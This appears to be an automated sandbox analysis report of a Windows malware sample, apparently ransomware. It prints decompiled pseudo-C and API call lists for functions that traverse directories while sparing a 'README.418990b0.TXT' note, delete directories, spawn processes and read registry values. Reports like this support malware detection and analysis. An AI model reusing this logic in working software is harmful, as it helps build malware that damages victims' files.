GetTokenInformation.KERNELBASE(00000010,00000001(TokenIntegrityLevel),?,00000028,?), ref: 00CE4A5B
LookupAccountSidW.ADVAPI32(00000000,?,?,00000080,?,00000080,00000001), ref: 00CE4AA2

Part of subcall function 00CE1AEC: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CE1B04

_wcsicmp.NTDLL ref: 00CE4AC4
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE4AE1
_wcsicmp.NTDLL ref: 00CE4AFB
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE4B4D
CloseHandle.KERNEL32(00000010), ref: 00CE4B56

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeToken_wcsicmp$AccountAllocateCloseHandleInformationLookupOpenProcess
String ID:
API String ID: 1926549887-0
Opcode ID: 68da1a32f22eb2c378b99b874868e8eef8a311b31e92cee8482126f88f29664c
Instruction ID: 9ff02fe2f03ee8a9201a8e3da0a1fd5fbc5d71059f6ec6c40c821e0e97d5fd6c
Opcode Fuzzy Hash: 68da1a32f22eb2c378b99b874868e8eef8a311b31e92cee8482126f88f29664c
Instruction Fuzzy Hash: 5A316172A00248AFEB109BD2DC49FFF777DEB44B01F100165FA15E2091EA71AA54DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CE694A, Relevance: 13.6, APIs: 9, Instructions: 85
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CE694A() {
				int _t42;
				signed short _t43;
				signed int _t45;
				wchar_t* _t46;
				char _t51;
				void* _t52;
				wchar_t* _t53;
				wchar_t* _t54;
				signed int _t58;
				char _t64;
				wchar_t* _t72;
				wchar_t* _t76;
				wchar_t* _t79;
				void* _t80;
				void* _t82;

				L17:
				while(1) {
					L17:
					while(1) {
						L17:
						while(1) {
							L17:
							if( *0xcf07ec != 0) {
								if(E00CE5B11(_t72,  *0xcf08fc) != 0) {
									while(1) {
										L31:
										E00CE13DA(_t80 - 0x260, _t80 - 0x260, 0x250);
										_t42 = FindNextFileW( *(_t80 - 4), _t80 - 0x260); // executed
										if(_t42 == 0) {
											break;
										}
										_t72 = _t80 - 0x234;
										if( *_t72 == 0x2e ||  *_t72 == 0x2e002e) {
											continue;
										} else {
											_t43 =  *(_t80 - 0x260);
											if((_t43 & 0x00000400) != 0) {
												continue;
											}
											if((_t43 & 0x00000010) == 0) {
												if( *0xcf07f3 == 0) {
													goto L17;
												}
												_t52 =  *0xcf0cd6(_t72, "README.418990b0.TXT");
												_t82 = _t82 + 8;
												if(_t52 != 0) {
													_t53 = wcsstr(_t72, 0xceb5c2);
													_t82 = _t82 + 8;
													if(_t53 == 0) {
														goto L17;
													}
													_t54 = wcsstr(_t72, 0xceb5d4);
													_t82 = _t82 + 8;
													if(_t54 == 0 || E00CE3C33(_t72,  *(_t80 + 8),  *0xcf0930) == 0) {
														goto L17;
													} else {
														continue;
													}
												}
												continue;
											}
											if( *0xcf07eb != 0) {
												if(E00CE5B11(_t72,  *0xcf08f8) != 0) {
													L9:
													continue;
												}
												L8:
												_t79 =  *(_t80 - 0xc);
												wcscpy(_t79, _t76);
												_t58 = wcslen(_t79);
												 *((short*)(_t79 + _t58 * 2 - 2)) = 0;
												_t12 = _t58 * 2; // -2
												wcscpy(_t79 + _t12 - 2, _t72);
												_t82 = _t82 + 0x14;
												E00CE67AD(_t79); // executed
												goto L9;
											}
											goto L8;
										}
									}
									FindClose( *(_t80 - 4)); // executed
									if( *0xcf07ee != 0) {
										 *(wcsrchr( *(_t80 - 8), 0x5c)) = 0;
										if(E00CE5B11( &((wcsrchr( *(_t80 - 8), 0x5c))[0]),  *0xcf0904) != 0) {
											if(PathIsDirectoryEmptyW( *(_t80 - 8)) == 0) {
												E00CE5490( *(_t80 - 8));
											}
											RemoveDirectoryW( *(_t80 - 8));
										}
									}
									RtlFreeHeap( *0xcf0a9e, 0,  *(_t80 - 8)); // executed
									_t64 = RtlFreeHeap( *0xcf0a9e, 0,  *(_t80 - 0xc)); // executed
									return _t64;
								}
								L20:
								if( *0xcf07ed != 0) {
									if(E00CE5B65(_t72,  *0xcf0900) != 0) {
										goto L31;
									}
									L23:
									if( *0xcf07ef != 0 && E00CE5B65(_t72,  *0xcf0908) != 0) {
										_t51 =  *0xcf07e0; // 0x1
										 *((char*)(_t80 - 0xd)) = _t51;
										 *0xcf07e0 = 1;
									}
									_t45 = GetFileAttributesW( *(_t80 + 8)); // executed
									if((_t45 & 0x00000010) == 0) {
										_t46 = wcsrchr(_t76, 0x5c);
										_t82 = _t82 + 8;
										 *_t46 = 0;
										E00CE6245(_t72,  *((intOrPtr*)(_t80 - 0x240)),  *((intOrPtr*)(_t80 - 0x244)), _t76);
									} else {
										E00CE6245(_t72,  *((intOrPtr*)(_t80 - 0x240)),  *((intOrPtr*)(_t80 - 0x244)),  *(_t80 + 8)); // executed
									}
									if( *((char*)(_t80 - 0xd)) != 0) {
										 *0xcf07e0 =  *((intOrPtr*)(_t80 - 0xd));
										 *((char*)(_t80 - 0xd)) = 0;
									}
									goto L31;
								}
								goto L23;
							}
							goto L20;
						}
					}
				}
			}

0x00000000
0x00ce698a
0x00000000
0x00ce698a
0x00000000
0x00ce698a
0x00ce698a
0x00ce6991
0x00ce69a3
0x00ce6a4d
0x00ce6a4d
0x00ce6a59
0x00ce6a68
0x00ce6a70
0x00000000
0x00000000
0x00ce68a4
0x00ce68ad
0x00000000
0x00ce68bf
0x00ce68bf
0x00ce68c9
0x00000000
0x00000000
0x00ce68d3
0x00ce6930
0x00000000
0x00000000
0x00ce6938
0x00ce693e
0x00ce6943
0x00ce6952
0x00ce6958
0x00ce695d
0x00000000
0x00000000
0x00ce6965
0x00ce696b
0x00ce6970
0x00000000
0x00ce6985
0x00000000
0x00ce6985
0x00ce6970
0x00000000
0x00ce6945
0x00ce68dc
0x00ce68ee
0x00ce6924
0x00000000
0x00ce6924
0x00ce68f0
0x00ce68f0
0x00ce68f5
0x00ce68ff
0x00ce6908
0x00ce6910
0x00ce6915
0x00ce691b
0x00ce691f
0x00000000
0x00ce691f
0x00000000
0x00ce68de
0x00ce68ad
0x00ce6a79
0x00ce6a86
0x00ce6a96
0x00ce6aba
0x00ce6ac7
0x00ce6acc
0x00ce6acc
0x00ce6ad4
0x00ce6ad4
0x00ce6aba
0x00ce6ae5
0x00ce6af6
0x00ce6b04
0x00ce6b04
0x00ce69a9
0x00ce69b0
0x00ce69c2
0x00000000
0x00000000
0x00ce69c8
0x00ce69cf
0x00ce69e1
0x00ce69e6
0x00ce69e9
0x00ce69e9
0x00ce69f3
0x00ce69fe
0x00ce6a1a
0x00ce6a20
0x00ce6a23
0x00ce6a36
0x00ce6a00
0x00ce6a10
0x00ce6a10
0x00ce6a3f
0x00ce6a44
0x00ce6a49
0x00ce6a49
0x00000000
0x00ce6a3f
0x00000000
0x00ce69b2
0x00000000
0x00ce6993
0x00ce698a
0x00ce698a

APIs

GetFileAttributesW.KERNEL32(00000000,?,?,?,?), ref: 00CE69F3
FindNextFileW.KERNEL32(000000FF,?,?,00000250,?,?), ref: 00CE6A68
FindClose.KERNEL32(000000FF,?,?), ref: 00CE6A79
wcsrchr.NTDLL ref: 00CE6A8D
wcsrchr.NTDLL ref: 00CE6AA0
PathIsDirectoryEmptyW.SHLWAPI(00000000), ref: 00CE6ABF
RemoveDirectoryW.KERNEL32(00000000), ref: 00CE6AD4
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE6AE5
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE6AF6

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryFileFindFreeHeapwcsrchr$AttributesCloseEmptyNextPathRemove
String ID:
API String ID: 4172428232-0
Opcode ID: 002a2f58b7398a97843e8c2b1b86973dc3618f9c52665f252ddecc01160f91c0
Instruction ID: 3d60f06ebfdb813b24c923f209cd208b5f01f2190bfe968d1403f50d7f52bcc7
Opcode Fuzzy Hash: 002a2f58b7398a97843e8c2b1b86973dc3618f9c52665f252ddecc01160f91c0
Instruction Fuzzy Hash: C9319371914288BEDF22ABA6EC09BFD7F36EB20745F2440A5E544600B3C7725A90EF12

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5125, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CE5125() {
				char _v8;
				struct _STARTUPINFOW _v80;
				struct _PROCESS_INFORMATION _v96;
				int _t22;

				 *0xcf0dd6( &_v8);
				E00CE13DA( &_v96,  &_v96, 0x10);
				E00CE13DA( &_v80,  &_v80, 0x48);
				_v80.cb = 0x48;
				E00CE16D5(0xceb5e2,  *0x00CEB5DE);
				_t22 = CreateProcessW(0, 0xceb5e2, 0, 0, 1, 0x8080000, 0, 0,  &_v80,  &_v96); // executed
				if(E00CE13DA(_t22, 0xceb5e2,  *((intOrPtr*)(0xceb5de))) != 0) {
					WaitForSingleObject(_v96.hProcess, 0xffffffff);
					CloseHandle(_v96);
					CloseHandle(_v96.hThread);
				}
				return  *0xcf0dda(_v8);
			}

0x00ce5134
0x00ce5140
0x00ce514b
0x00ce5150
0x00ce5161
0x00ce5184
0x00ce5195
0x00ce519c
0x00ce51a5
0x00ce51ae
0x00ce51ae
0x00ce51c5

APIs

Wow64DisableWow64FsRedirection.KERNEL32(00000000,?,?,?,?,00000000), ref: 00CE5134
CreateProcessW.KERNEL32(00000000,00CEB5E2,00000000,00000000,00000001,08080000,00000000,00000000,00000048,?,00000000,00000002,?,00000048,?,00000010), ref: 00CE5184
WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000002,?,?,?,?,00000000), ref: 00CE519C
CloseHandle.KERNEL32(?,?,?,?,?,00000000), ref: 00CE51A5
CloseHandle.KERNEL32(?,?,?,?,?,00000000), ref: 00CE51AE
Wow64RevertWow64FsRedirection.KERNEL32(00000000,00000000,00000002,?,?,?,?,00000000), ref: 00CE51B7

Strings

H, xrefs: 00CE5150

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Wow64$CloseHandleRedirection$CreateDisableObjectProcessRevertSingleWait
String ID: H
API String ID: 2972635663-2852464175
Opcode ID: 4801c8794fcf449c7b487eefd3e0f6ea0cbfcbb068ac4cde815c5ce3cac9d8e6
Instruction ID: 0472cba62d55441e8d193175f7a26100f8d2416dc570220bcdcb7f9f7fc76aa8
Opcode Fuzzy Hash: 4801c8794fcf449c7b487eefd3e0f6ea0cbfcbb068ac4cde815c5ce3cac9d8e6
Instruction Fuzzy Hash: 9811A572940208BFDF10ABD1EC4AFAEBB7CEB08B11F204511F611A90E5DBB16515DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00CE72C0, Relevance: 10.8, APIs: 7, Instructions: 314
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CE72C0(void* __fp0) {
				intOrPtr _v8;
				void* _t61;

				_t61 = __fp0;
				_v8 =  *0xcf0dde(0x80000001);
				if( *0xcf092c != 0) {
					E00CE16D5(0xceb264,  *0xceb260);
					_t3 = E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb264, 0, 0), 0xceb264,  *0xceb260);
				}
				if( *0xcf07e4 == 0) {
					L9:
					if( *0xcf07f7 != 0) {
						 *0xcf0aaa = 0;
						 *0xcf0aae = 0;
						 *0xcf0ab2 = 0;
						 *0xcf0ab6 = 0;
						 *0xcf0aba = 0; // executed
						_t3 = E00CE3573(); // executed
					}
					if( *0xcf0924 != 0) {
						if( *0xcf07e6 != 0) {
							if( *0xcf092c != 0) {
								E00CE16D5(0xceb322,  *0xceb31e);
								E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb322, 0, 0), 0xceb322,  *0xceb31e); // executed
							}
							_t3 = E00CE51E6(); // executed
						}
						if( *0xcf07e5 != 0) {
							if( *0xcf092c != 0) {
								E00CE16D5(0xceb380,  *0xceb37c);
								E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb380, 0, 0), 0xceb380,  *0xceb37c);
							}
							_t3 = E00CE51C6();
						}
						if( *0xcf07f1 != 0) {
							if( *0xcf092c != 0) {
								E00CE16D5(0xceb350,  *0xceb34c);
								E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb350, 0, 0), 0xceb350,  *0xceb34c); // executed
							}
							E00CE4C7B(); // executed
							_t3 = RtlFreeHeap( *0xcf0a9e, 0,  *0xcf0914);
						}
						if( *0xcf07f0 != 0) {
							if( *0xcf092c != 0) {
								E00CE16D5(0xceb3b2,  *0xceb3ae);
								E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb3b2, 0, 0), 0xceb3b2,  *0xceb3ae); // executed
							}
							E00CE4DDA(); // executed
							_t3 = RtlFreeHeap( *0xcf0a9e, 0,  *0xcf0910);
						}
					}
					if( *0xcf092c != 0) {
						if( *0xcf07e0 != 1) {
							if( *0xcf07e0 != 2) {
								E00CE16D5(0xceb578,  *0xceb574);
								E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb578, 0, 0), 0xceb578,  *0xceb574);
							} else {
								E00CE16D5(0xceb54c,  *0xceb548);
								E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb54c, 0, 0), 0xceb54c,  *0xceb548);
							}
						} else {
							E00CE16D5(0xceb520,  *0xceb51c);
							E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb520, 0, 0), 0xceb520,  *0xceb51c);
						}
						E00CE16D5(0xceb44c,  *0xceb448);
						E00CE16D5(0xceb47e,  *0xceb47a);
						E00CE16D5(0xceb4ac,  *0xceb4a8);
						E00CE16D5(0xceb4cc,  *0xceb4c8);
						_t3 = E00CE16D5(0xceb4e8,  *0xceb4e4);
					}
					if( *0xcf07f3 != 0) {
						E00CE16D5(0xceb5c2,  *0xceb5be);
						_t3 = E00CE16D5(0xceb5d4,  *0xceb5d0);
					}
					if( *0xcf07e2 != 0) {
						if( *0xcf092c != 0) {
							E00CE16D5(0xceb3e2,  *0xceb3de);
							E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb3e2, 0, 0), 0xceb3e2,  *0xceb3de); // executed
						}
						_t3 = E00CE6DB9(); // executed
					}
					if( *0xcf07e3 != 0) {
						if( *0xcf092c != 0) {
							E00CE16D5(0xceb414,  *0xceb410);
							E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb414, 0, 0), 0xceb414,  *0xceb410);
						}
						_t3 = E00CE6E33();
					}
					if( *0xcf07ee != 0) {
						_t3 = RtlFreeHeap( *0xcf0a9e, 0,  *0xcf0904);
					}
					if( *0xcf07ef != 0) {
						_t3 = RtlFreeHeap( *0xcf0a9e, 0,  *0xcf0908);
					}
					if( *0xcf0924 != 0 &&  *0xcf07f2 != 0) {
						E00CE4255( *0xcf091c);
						_t3 = RtlFreeHeap( *0xcf0a9e, 0,  *0xcf091c);
					}
					if( *0xcf07f3 != 0) {
						_t3 = E00CE13DA(E00CE13DA(_t3, 0xceb5c2,  *0xceb5be), 0xceb5d4,  *0xceb5d0);
					}
					if( *0xcf092c != 0) {
						E00CE13DA(E00CE13DA(E00CE13DA(E00CE13DA(E00CE13DA(_t3, 0xceb44c,  *0xceb448), 0xceb47e,  *0xceb47a), 0xceb4ac,  *0xceb4a8), 0xceb4cc,  *0xceb4c8), 0xceb4e8,  *0xceb4e4);
					}
					if( *0xcf07f7 != 0) {
						E00CE3690(_t61);
					}
					return  *0xcf0dde(_v8);
				} else {
					if( *0xcf092c != 0) {
						E00CE16D5(0xceb29e,  *0xceb29a);
						E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb29e, 0, 0), 0xceb29e,  *0xceb29a);
					}
					_t3 = E00CE4819();
					if(_t3 == 0) {
						goto L9;
					} else {
						if( *0xcf092c != 0) {
							E00CE16D5(0xceb2ce,  *0xceb2ca);
							return E00CE13DA(E00CE3E63( *0xcf092c, 0xceb20a, 0xceb2ce, 0, 0), 0xceb2ce,  *0xceb2ca);
						}
						return _t3;
					}
				}
			}

0x00ce72c0
0x00ce72d6
0x00ce72e0
0x00ce72ed
0x00ce7316
0x00ce7316
0x00ce7322
0x00ce73be
0x00ce73c5
0x00ce73c9
0x00ce73ce
0x00ce73d3
0x00ce73d8
0x00ce73dd
0x00ce73e2
0x00ce73e2
0x00ce73ee
0x00ce73fb
0x00ce7404
0x00ce7411
0x00ce743a
0x00ce743a
0x00ce743f
0x00ce743f
0x00ce744b
0x00ce7454
0x00ce7461
0x00ce748a
0x00ce748a
0x00ce748f
0x00ce748f
0x00ce749b
0x00ce74a4
0x00ce74b1
0x00ce74da
0x00ce74da
0x00ce74df
0x00ce74f2
0x00ce74f2
0x00ce74ff
0x00ce7508
0x00ce7515
0x00ce753e
0x00ce753e
0x00ce7543
0x00ce7556
0x00ce7556
0x00ce74ff
0x00ce7563
0x00ce7570
0x00ce75b4
0x00ce75fc
0x00ce7625
0x00ce75b6
0x00ce75c1
0x00ce75ea
0x00ce75ea
0x00ce7572
0x00ce757d
0x00ce75a6
0x00ce75a6
0x00ce7635
0x00ce7645
0x00ce7655
0x00ce7665
0x00ce7675
0x00ce7675
0x00ce7681
0x00ce768e
0x00ce769e
0x00ce769e
0x00ce76aa
0x00ce76b3
0x00ce76c0
0x00ce76e9
0x00ce76e9
0x00ce76ee
0x00ce76ee
0x00ce76fa
0x00ce7703
0x00ce7710
0x00ce7739
0x00ce7739
0x00ce773e
0x00ce773e
0x00ce774a
0x00ce775a
0x00ce775a
0x00ce7767
0x00ce7777
0x00ce7777
0x00ce7784
0x00ce7795
0x00ce77a8
0x00ce77a8
0x00ce77b5
0x00ce77d2
0x00ce77d2
0x00ce77de
0x00ce782b
0x00ce782b
0x00ce7837
0x00ce7839
0x00ce7839
0x00ce784f
0x00ce7328
0x00ce732f
0x00ce733c
0x00ce7365
0x00ce7365
0x00ce736a
0x00ce7371
0x00000000
0x00ce7373
0x00ce737a
0x00ce7387
0x00000000
0x00ce73b0
0x00ce73bd
0x00ce73bd
0x00ce7371

APIs

RtlFreeHeap.NTDLL(00000000), ref: 00CE74F2
RtlFreeHeap.NTDLL(00000000), ref: 00CE7556

Part of subcall function 00CE3573: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE363C
Part of subcall function 00CE3573: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE3653
Part of subcall function 00CE3573: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE366A
Part of subcall function 00CE3573: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE3681

SetThreadExecutionState.KERNEL32(80000001), ref: 00CE72D0

Part of subcall function 00CE3E63: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002,?,00000000,?,?,00000000), ref: 00CE3E83
Part of subcall function 00CE3E63: RtlAllocateHeap.NTDLL(00000000,00010000), ref: 00CE3E96
Part of subcall function 00CE3E63: _swprintf.NTDLL ref: 00CE3EBB
Part of subcall function 00CE3E63: _swprintf.NTDLL ref: 00CE3ED6
Part of subcall function 00CE3E63: _swprintf.NTDLL ref: 00CE3EF1
Part of subcall function 00CE3E63: _swprintf.NTDLL ref: 00CE3F0C
Part of subcall function 00CE3E63: wcscpy.NTDLL ref: 00CE3F1E
Part of subcall function 00CE3E63: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00CE3F3E
Part of subcall function 00CE3E63: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE3F4F

RtlFreeHeap.NTDLL(00000000), ref: 00CE775A
RtlFreeHeap.NTDLL(00000000), ref: 00CE7777
RtlFreeHeap.NTDLL(00000000), ref: 00CE77A8
SetThreadExecutionState.KERNEL32(00000010), ref: 00CE7841

Part of subcall function 00CE3690: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE37A2
Part of subcall function 00CE3690: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00CE37B9

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$_swprintf$ExecutionFileStateThread$AllocatePointerWritewcscpy
String ID:
API String ID: 477981078-0
Opcode ID: 9f387a4464501fc7638d33e3f10f1cfca6b10f375214a20930acf9c20d114779
Instruction ID: 44d311c789a7927e8dcca18f64252aca32c8cc346972dce8aec41d085f461c18
Opcode Fuzzy Hash: 9f387a4464501fc7638d33e3f10f1cfca6b10f375214a20930acf9c20d114779
Instruction Fuzzy Hash: E7C11C716853C1BAEB1277A7AD4BF7E3B61AB08B14F680121F611244F397E11E60EB16

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2E78, Relevance: 10.6, APIs: 7, Instructions: 81
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE2E78(wchar_t* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char _v80;
				short _v208;
				long _t16;
				long _t23;
				signed int _t33;
				void* _t35;
				void* _t36;

				_t36 = E00CE1AEC(0xceb80e);
				_t16 = RegOpenKeyExW(0x80000002, _t36, 0, 0x101,  &_v8); // executed
				if(_t16 == 0) {
					_v12 = 1;
					_v16 = 0x80;
					_t35 = E00CE1AEC(0xceb852);
					_t23 = RegQueryValueExW(_v8, _t35, 0,  &_v12,  &_v208,  &_v16); // executed
					if(_t23 == 0) {
						E00CE151D(E00CE1E10( &_v80, WideCharToMultiByte(0, 0,  &_v208, 0xffffffff,  &_v80, 0x40, 0, 0), 0), 0xa, _a4);
						_t33 = wcslen(_a4) << 1;
					}
					RtlFreeHeap( *0xcf0a9e, 0, _t35);
					RegCloseKey(_v8);
				}
				RtlFreeHeap( *0xcf0a9e, 0, _t36);
				return _t33;
			}

0x00ce2e90
0x00ce2ea3
0x00ce2eab
0x00ce2eb1
0x00ce2eb8
0x00ce2ec9
0x00ce2ee0
0x00ce2ee8
0x00ce2f19
0x00ce2f2c
0x00ce2f2c
0x00ce2f37
0x00ce2f40
0x00ce2f40
0x00ce2f4f
0x00ce2f5f

APIs

Part of subcall function 00CE1AEC: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CE1B04

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00000101,00000000,00CEB80E,?,?,?,?,00000000), ref: 00CE2EA3
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000001,?,00000080,00CEB852,?,?,?,?,00000000), ref: 00CE2EE0
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000040,00000000,00000000,?,?,?,?,00000000), ref: 00CE2F01

Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(DEADBEEF,?,00000000), ref: 00CE1E3D
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E4A
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E59
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E69
Part of subcall function 00CE1E10: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 00CE1E79

wcslen.NTDLL ref: 00CE2F21
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE2F37
RegCloseKey.ADVAPI32(00000000,?,?,?,?,00000000), ref: 00CE2F40
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE2F4F

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputeCrc32$Heap$Free$AllocateByteCharCloseMultiOpenQueryValueWidewcslen
String ID:
API String ID: 323168505-0
Opcode ID: 423276c0df112e7dda38b4d16e45d9d1203659f02b44b77c2bb1aa2b1e9fe149
Instruction ID: 50e4e6ce008a3887cdee84ad17563777a00dcae56dcf72a69341397f3df4c72d
Opcode Fuzzy Hash: 423276c0df112e7dda38b4d16e45d9d1203659f02b44b77c2bb1aa2b1e9fe149
Instruction Fuzzy Hash: 1921A172740208BBFB20ABD1DC4AFAF7B7DEB44B50F200125FA04A50E2D6B16A54DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3F60, Relevance: 10.6, APIs: 7, Instructions: 77
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE3F60(intOrPtr _a4) {
				void* _v8;
				long _v12;
				short _v532;
				void* _t12;
				void* _t15;
				int _t16;
				int _t18;
				void* _t20;
				void* _t24;
				long _t25;

				_t12 = GetModuleFileNameW( *0xcf0aa2,  &_v532, 0x104);
				if(_t12 == 0) {
					L8:
					return _t12;
				}
				_t12 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v8 = _t12;
				if(_v8 == 0xffffffff) {
					goto L8;
				}
				_t25 = GetFileSize(_v8, 0);
				_t15 = RtlAllocateHeap( *0xcf0a9e, 0, _t25); // executed
				_t24 = _t15;
				if(_t24 != 0) {
					_t18 = ReadFile(_v8, _t24, _t25,  &_v12, 0); // executed
					if(_t18 != 0) {
						_t20 = E00CE1E10(_t24, _t25, 0);
						_t9 = _a4 - 4; // 0x0
						E00CE16D5(_a4,  *_t9);
						E00CE151D(_t20, 0x10, _t26 + 0xe);
					}
					if(_t24 != 0) {
						RtlFreeHeap( *0xcf0a9e, 0, _t24);
					}
				}
				_t16 = FindCloseChangeNotification(_v8); // executed
				return _t16;
			}

0x00ce3f80
0x00ce3f88
0x00ce4034
0x00ce4034
0x00ce4034
0x00ce3fa7
0x00ce3fad
0x00ce3fb4
0x00000000
0x00000000
0x00ce3fc1
0x00ce3fcc
0x00ce3fd2
0x00ce3fd6
0x00ce3fe3
0x00ce3feb
0x00ce3ff1
0x00ce3ffb
0x00ce3fff
0x00ce400b
0x00ce400b
0x00ce4012
0x00ce401d
0x00ce401d
0x00ce4012
0x00ce4026
0x00000000

APIs

GetModuleFileNameW.KERNEL32(?,00000104,?,?,?,?,00000000), ref: 00CE3F80
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 00CE3FA7
GetFileSize.KERNEL32(000000FF,00000000,?,?,?,?,00000000), ref: 00CE3FBB
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00CE3FCC
ReadFile.KERNEL32(000000FF,00000000,00000000,00CED4DD,00000000,?,?,?,?,00000000), ref: 00CE3FE3
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00CE401D

